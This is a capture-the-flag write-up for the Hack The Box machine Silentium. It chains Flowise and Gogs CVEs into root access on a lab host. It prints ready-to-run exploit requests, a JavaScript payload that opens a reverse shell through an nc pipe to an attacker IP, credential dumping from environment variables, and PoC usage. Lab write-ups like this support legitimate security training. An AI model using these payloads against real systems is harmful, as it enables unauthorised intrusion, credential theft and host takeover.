Silentium WriteUp

Table of Contents

Silentium WriteUp

Silentium is a 🟩 Easy machine on Hack The Box, Season 10. The attack chain starts by enumerating subdomains to discover a Flowise 3.0.5 instance, abuses an unauthenticated password reset token leak to gain admin access, injects JavaScript through the CustomMCP node to achieve RCE inside a Docker container, extracts credentials from environment variables, and escalates to root by exploiting a symlink traversal vulnerability in Gogs v0.13.0.

πŸ—ΊοΈ Attack Chain

Reconnaissance β†’ Ports 22, 80
      β”‚
      β–Ό
Subdomain enumeration β†’ staging.silentium.htb (Flowise 3.0.5)
      β”‚
      β–Ό
CVE-2025-58434 β†’ Leaked reset token β†’ ben@silentium.htb β†’ Flowise admin
      β”‚
      β–Ό
CVE-2025-59528 β†’ CustomMCP code injection β†’ RCE in Docker container (root)
      β”‚
      β–Ό
Environment variables β†’ SMTP_PASSWORD=r04D!!_R4ge β†’ SSH as ben
      β”‚
      β–Ό
Internal port 3001 β†’ Gogs v0.13.0 β†’ CVE-2025-8110 (symlink traversal)
      β”‚
      β–Ό
RCE as root on the host β†’ root 🏴

πŸ” Reconnaissance

/etc/hosts Configuration

echo "10.129.33.247 silentium.htb" | sudo tee -a /etc/hosts

Port Scan

Phase 1, Fast TCP port discovery:

sudo nmap -p- --open -Pn --min-rate 5000 -oA ports -vvv silentium.htb

Phase 2, Version and script detection:

grep -oP '\d+/open' ports.gnmap | cut -d'/' -f1 | sort -u | tr '\n' ',' | sed 's/,$//' > ports.txt
sudo nmap -sCV -p$(cat ports.txt) -Pn -oA scan -vvv silentium.htb
PortServiceDetail
22SSHOpenSSH 9.6p1 (Ubuntu)
80HTTPnginx 1.24.0 (Ubuntu)

Web Enumeration

The main site http://silentium.htb shows a static corporate asset management website. We can identify 3 potential users: Marcus, Ben, and Elena.

Silentium WriteUp

We enumerate virtual subdomains:

ffuf -ic -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://silentium.htb" -H "Host: FUZZ.silentium.htb" -fc 301
staging   [Status: 200, Size: 3142]

🎯 We found staging.silentium.htb. Adding it to /etc/hosts:

sudo sed -i 's/silentium.htb/silentium.htb staging.silentium.htb/' /etc/hosts

Visiting http://staging.silentium.htb shows the Flowise 3.0.5 AI agent builder interface.

Silentium WriteUp

User Enumeration

The login endpoint returns different responses for existing vs non-existing users, User Not found vs Incorrect Email or Password:

🎯 User ben@silentium.htb exists in the system.

πŸ’‰ Initial Access

CVE-2025-58434, Flowise Password Reset Token Leak

🧠 Flowise ≀ 3.0.12 exposes the /api/v1/account/forgot-password endpoint which returns the full user object, including the password reset token, without requiring authentication. The vulnerability is triggered by adding the x-request-from: internal header, which bypasses authentication checks.

We request a reset for ben@silentium.htb and capture the token:

curl -s -X POST http://staging.silentium.htb/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -d '{"user":{"email":"ben@silentium.htb"}}'
{
  "id": "e26c9d6c-678c-4c10-9e36-01813e8fea73",
  "email": "ben@silentium.htb",
  "tempToken": "3EUlW37Q2asfL8EGS0jH3A2ngK6i3O3WTM0kkWWUbFjc5Zc6N3X651RuS2Nmkx1U",
  "resetPasswordExpires": "2026-04-17T18:30:00.000Z"
}

We use the tempToken to set a new password:

curl -s -X POST http://staging.silentium.htb/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -d '{"user":{"email":"ben@silentium.htb","tempToken":"3EUlW37Q2asfL8EGS0jH3A2ngK6i3O3WTM0kkWWUbFjc5Zc6N3X651RuS2Nmkx1U","password":"1Qwerty!"}}'

βœ… Admin access to Flowise as ben@silentium.htb:1Qwerty!.

CVE-2025-59528, CustomMCP Code Injection (CVSS 10.0)

🧠 Flowise β‰₯ 2.2.7-patch.1 and < 3.0.6 allows arbitrary JavaScript execution through the CustomMCP node. The mcpServerConfig parameter is passed unsanitized to Node.js’s Function() constructor, allowing any authenticated user to execute code on the server with the Flowise process privileges (root inside the Docker container).

Set up the listener:

penelope -p 8443

Flowise uses cookie-based sessions. We log in saving the cookie and reuse it in the exploit:

curl -s -X POST http://staging.silentium.htb/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -d '{"email":"ben@silentium.htb","password":"1Qwerty!"}' \
  -c cookies.txt

curl -s -X POST http://staging.silentium.htb/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -b cookies.txt \
  -d '{"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.100 8443 >/tmp/f\");return 1;})()} )"}}'
[x] Command executed

The listener receives the connection:

/ # id
uid=0(root) gid=0(root) groups=0(root)
/ # hostname
c78c3cceb7ba

βœ… RCE as root inside the Docker container.

πŸ”‘ Credential Extraction, Environment Variables

From the container, we list environment variables looking for credentials:

env
FLOWISE_USERNAME=ben
FLOWISE_PASSWORD=F1l3_d0ck3r
SMTP_PASSWORD=r04D!!_R4ge
SMTP_HOST=mailhog
SENDER_EMAIL=ben@silentium.htb
JWT_AUTH_TOKEN_SECRET=AABBCCDDAABBCCDDAABBCCDDAABBCCDDAABBCCDD
DATABASE_PATH=/root/.flowise
PORT=3000
...

πŸ”‘ SSH credential found: ben:r04D!!_R4ge

πŸ”€ Lateral Movement, SSH as ben

ssh ben@silentium.htb # r04D!!_R4ge

🚩 User Flag

cat ~/user.txt

πŸ§—β€β™‚οΈ Privilege Escalation, CVE-2025-8110

Internal Enumeration

From the ben SSH session, we look for internal services:

ss -tlnp
LISTEN  0  128  127.0.0.1:3001  0.0.0.0:*

We tunnel the port to access it from Kali:

ssh -f -N -L 3001:127.0.0.1:3001 ben@silentium.htb

Visiting http://127.0.0.1:3001 shows Gogs v0.13.0, a self-hosted Git server.

Silentium WriteUp

What is CVE-2025-8110?

🧠 Gogs ≀ v0.13.3 does not properly validate symbolic links when writing files to a repository. An authenticated attacker can create a symlink pointing to .git/config and use the PutContents API to overwrite that file through the symlink. By injecting a malicious core.sshCommand directive, the command executes the next time Gogs performs internal Git operations with the process privileges, in this case, root.

Exploitation

Download the PoC:

git clone https://github.com/zAbuQasem/gogs-CVE-2025-8110
cd gogs-CVE-2025-8110
pip install -r requirements.txt

πŸ’‘ The script tries to auto-register a user, but Gogs has CAPTCHA enabled. Follow these manual steps:

  1. Register at http://127.0.0.1:3001/user/sign_up with test:Password123!
  2. Generate an API token at http://127.0.0.1:3001/user/settings/applications β†’ Generate New Token
  3. Comment out the registration call in main():

Silentium WriteUp

# register(session, args.url, username, password)   # commented: manual registration
login(session, args.url, username, password)

Set up the listener:

penelope -p 8443

Run the exploit against the tunneled Gogs instance:

python3 CVE-2025-8110.py -u http://127.0.0.1:3001 -lh 10.10.14.100 -lp 8443
[+] Exploit sent, check your listener!

The listener receives the shell:

root@silentium:~# id
uid=0(root) gid=0(root) groups=0(root)
root@silentium:~# hostname
silentium

βœ… Root shell on the host obtained.

🏴 Root Flag

cat /root/root.txt

πŸ“ Attack Chain Summary

#TechniqueToolResult
1ReconnaissancenmapPorts 22 and 80 (nginx)
2Subdomain enumerationffufstaging.silentium.htb β†’ Flowise 3.0.5
3User enumerationcurlben@silentium.htb identified
4Leaked reset tokenCVE-2025-58434Flowise admin access
5Docker RCECVE-2025-59528 (CustomMCP)Shell as root in container
6Credential extractionenvben:r04D!!_R4ge from environment variables
7Lateral movementsshAccess as ben + User Flag 🚩
8Gogs discoveryss + SSH tunnelGogs v0.13.0 on internal port 3001
9Symlink traversal + config injectionCVE-2025-8110 PoC.git/config overwritten
10Root escalationGogs sshCommandShell as root + Root Flag 🏴

See you in the next challenge.